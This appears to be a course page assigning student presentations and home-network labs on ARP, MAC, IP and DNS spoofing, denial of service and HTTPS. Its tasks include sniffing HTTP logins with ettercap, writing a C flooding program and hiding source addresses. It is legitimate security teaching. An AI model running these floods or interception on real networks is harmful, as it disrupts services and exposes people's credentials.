Presentations/research - A good link/research to get started - Basic idea - how does it work, including a good picture/diagram or few - Famous example(s) - bad, good - How to do it? Source code and/or utilities and/or configuration/commands on the system. - Countermeasures - If possible, you do it on your local network at home, and if possible demo that during class. - Make some slides or notes, ~cs473xy/public_html/h6, also put source code or any other files. mkdir ~/public_html chmod a+x ~ chmod a+rx ~/public_html - When you have something, send to Jeff for review, a day ahead of time if possible. ARP spoofing - cs47303. April 6. * stated versus stateless protocol (ARP is stateless) * Questions - + How to do it? Source code? + Famous example(s) * Slides - check link in Teams * Tasks - + Connect new device to network, see what ARP messages show up in wireshark. Does MAC address of new device get broadcast to the entire network? Probably yes. Is there a way to make it so it only broadcasts to the switch and not other devices? Does the computer itself send the ARP message, or does tht switch? + ettercap - check video in Teams, target a device on your network, enter username in http (not https) and see if it shows in ettercap MAC spoofing - cs47301. * https://en.wikipedia.org/wiki/MAC_spoofing * https://www.ionos.com/digitalguide/server/know-how/what-is-mac-spoofing/ * https://www.howtogeek.com/192173/how-and-why-to-change-your-mac-address-on-windows-linux-and-mac/ * Questions - + Commands to do this on Windows, Mac, Linux? + What would the C code look like, or is there is really C code for this? + Software that licenses based on MAC address - example? + Filtering software that uses this, and how exactly? + Countermeasures? + Famous example(s) IP spoofing - cs47302. * wikipedia - * https://www.iplocation.net/ip-spoofing * https://www.cloudflare.com/learning/ddos/glossary/ip-spoofing/ * https://www.ionos.com/digitalguide/server/security/ip-spoofing-fundamentals-and-counter-measures/ * https://sites.google.com/site/cacsolin/mitnick--shimomura * http://wiki.cas.mcmaster.ca/index.php/The_Mitnick_attack * Basic idea - create IP packets yourself with a different IP address, send them. * Why? DoS - (a) use many IPs, which takes more resources, (b) anything malicious to make it less traceable. * Questions - + Source code for doing this? Probably can use pcap. + Other reasons? Any good reasons? Testing. + Countermeasures? + Famous example(s) * Tasks + DoS on your local network + Set a static IP address on your computer at home - use one that's not taken, verify it works. can use ettercap to see which IP addresses are taken. also monitor on wireshark. also in your router configuration. - use one that is taken, see what happens on both devices. + Write a DoS program in C. ./DoS IP_address port(s) - forever loop sending lots of traffic to those ports - lots of writes, lots of new connections - Note - you would potentially set a static IP address and change your MAC address before doing this. - Note - only do this on your local network + Try out pentmenu + DoS where you continuously change your IP address - in C you use raw sockets. DNS spoofing - cs47304. Give us the basic overview of DNS. * wikipedia - * Why? Stealing traffic * Questions - + How to do it? + Countermeasures? + Good uses? + How does DNS work - A and NS records and such + Famous example(s) Denial of Service - cs47305. How it works, example code, and a famous example or two. * wikipedia - * Questions - + How to do it? Example code and/or tools. + Countermeasures? + Good uses? + Famous example(s) https - cs47306 - similar to looking at TCP, how does it work, what goes back and forth, can we see this in wireshark IP routing - Jeff, maybe - how does a packet actually get to its destination. send to 139.102.14.201 - what happens when the packet leaves my house?